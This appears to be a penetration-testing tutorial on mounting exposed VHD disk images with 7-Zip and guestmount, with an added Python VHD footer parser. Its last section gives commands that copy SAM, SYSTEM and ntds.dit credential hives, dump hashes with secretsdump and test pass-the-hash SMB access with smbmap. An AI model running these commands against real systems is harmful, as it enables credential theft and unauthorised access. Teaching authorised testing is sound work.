On an engagement, you may come across VHD files that are not stored properly. They could be sitting on an exposed NFS or SMB share, or they could come from a backup file that you exfiltrated. However you come across these files, there are several ways to go through them and extract critical information.
Using 7-Zip, you can list the contents of a VHD file without mounting it.
7z l file.vhd
To extract the contents, you can also use 7-Zip.
7z x file.vhd
Mounting a VHD on Linux
To mount a VHD on Linux, you can use guestmount, which is part of libguestfs-tools.
sudo apt install libguestfs-tools -y
Now we’ll start by creating the directory that the VHD file will be mounted on.
sudo mkdir /mnt/vhd
Then we’ll use guestmount to mount the VHD onto that directory in read-only (--ro) mode, so nothing inside the image is modified while we look at it.
sudo guestmount --add file.vhd --inspector --ro -v /mnt/vhd
This can take a few minutes depending on the size of the image, but eventually it will finish and you should be able to view the contents.
cd /mnt/vhd
ls -la
To list the files of select directories, you can use find.
find Desktop Documents Downloads -ls
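Before spending minutes on a mount, it is worth checking that the file really is a VHD and what kind it is: the 512-byte footer at the end of every VHD records the disk type (fixed, dynamic or differencing), the virtual disk size and a checksum, and a differencing disk references a parent image, so it will not mount on its own. The Python below is an added example written for this page, not code from the original notes or from 7-Zip or libguestfs; the footer layout and checksum rule follow the published VHD specification, and the sample footers are constructed inline with build_vhd_footer rather than taken from any real image.

```python
import datetime
import struct

# VHD footer layout (512 bytes, big-endian) per the Microsoft VHD specification.
VHD_FOOTER_SIZE = 512
VHD_COOKIE = b"conectix"
DISK_TYPES = {0: "none", 2: "fixed", 3: "dynamic", 4: "differencing"}
VHD_EPOCH = datetime.datetime(2000, 1, 1, tzinfo=datetime.timezone.utc)
# Fields between the cookie (offset 0) and the unique id (offset 68).
FOOTER_FIELDS = ">IIQI4sI4sQQHBBII"


def vhd_checksum(footer: bytes) -> int:
    """One's complement of the byte sum over the footer, excluding the
    4-byte checksum field at offset 64."""
    total = sum(footer[:64]) + sum(footer[68:])
    return (~total) & 0xFFFFFFFF


def parse_vhd_footer(footer: bytes) -> dict:
    """Decode a raw 512-byte VHD footer into a triage-friendly dict."""
    if len(footer) != VHD_FOOTER_SIZE:
        raise ValueError("footer must be exactly 512 bytes")
    if footer[0:8] != VHD_COOKIE:
        raise ValueError("not a VHD footer (missing 'conectix' cookie)")
    (features, version, data_offset, timestamp, creator_app, creator_ver,
     creator_os, original_size, current_size, cylinders, heads, spt,
     disk_type, checksum) = struct.unpack(FOOTER_FIELDS, footer[8:68])
    created = VHD_EPOCH + datetime.timedelta(seconds=timestamp)
    return {
        "disk_type": DISK_TYPES.get(disk_type, f"unknown({disk_type})"),
        # A differencing disk is only a delta; guestmount needs the parent too.
        "needs_parent": disk_type == 4,
        # Virtual disk size, not file size: a dynamic VHD file is usually smaller.
        "current_size": current_size,
        "original_size": original_size,
        "created": created.isoformat(),
        "creator_app": creator_app.decode("ascii", "replace").strip(),
        "creator_os": creator_os.decode("ascii", "replace"),
        "geometry": (cylinders, heads, spt),
        # 0xFFFFFFFFFFFFFFFF means "no dynamic header", i.e. a fixed disk.
        "data_offset": data_offset,
        "saved_state": footer[84] == 1,
        "uuid": footer[68:84].hex(),
        # A bad checksum points at truncation or corruption before you mount.
        "checksum_ok": vhd_checksum(footer) == checksum,
    }


def inspect_vhd_file(path: str) -> dict:
    """Read the footer from the last 512 bytes of a VHD file on disk."""
    with open(path, "rb") as fh:
        fh.seek(-VHD_FOOTER_SIZE, 2)
        return parse_vhd_footer(fh.read(VHD_FOOTER_SIZE))


def build_vhd_footer(disk_type: int, size: int, creator_app: bytes = b"win ") -> bytes:
    """Construct a sample footer for offline testing (constructed data, not
    from any real image). size is the virtual disk size in bytes."""
    data_offset = 0xFFFFFFFFFFFFFFFF if disk_type == 2 else VHD_FOOTER_SIZE
    body = struct.pack(FOOTER_FIELDS,
                       2,            # features: reserved bit always set
                       0x00010000,   # file format version 1.0
                       data_offset,
                       0,            # timestamp: 2000-01-01T00:00:00Z
                       creator_app, 0x000A0000, b"Wi2k",
                       size, size,
                       1, 1, 1,      # geometry placeholder
                       disk_type, 0)  # checksum filled in below
    footer = VHD_COOKIE + body + b"\x00" * 16 + b"\x00" + b"\x00" * 427
    checksum = vhd_checksum(footer)
    return footer[:64] + struct.pack(">I", checksum) + footer[68:]


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, inspect_vhd_file(p))
```

Run it as `python3 vhdinfo.py file.vhd` to print the decoded footer. If `needs_parent` is true, locate the parent image before trying guestmount; if `checksum_ok` is false, the file is probably truncated, which explains a guestmount that hangs or fails during inspection.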
Extracting Local SAM Database from VHD Files
First, follow the steps above to mount the VHD file. Once it is mounted, you may be able to copy the registry hives that make up the local SAM database so you can crack the hashes offline.
cd /mnt/vhd/Windows/System32/config
cp SAM SYSTEM /<localDir>
Note: You may also want to grab ntds.dit if the image is from a domain controller, so you can crack all of the AD hashes.
Now you can go to the local directory that you copied those files into and use secretsdump to extract the hashes.
impacket-secretsdump -sam SAM -system SYSTEM local
Instead of taking the hash offline to try to crack it, you can check whether that hash gives you write access to any SMB share by using smbmap.
smbmap -u <userName> -p <lmHash:ntHash> -H <targetIP>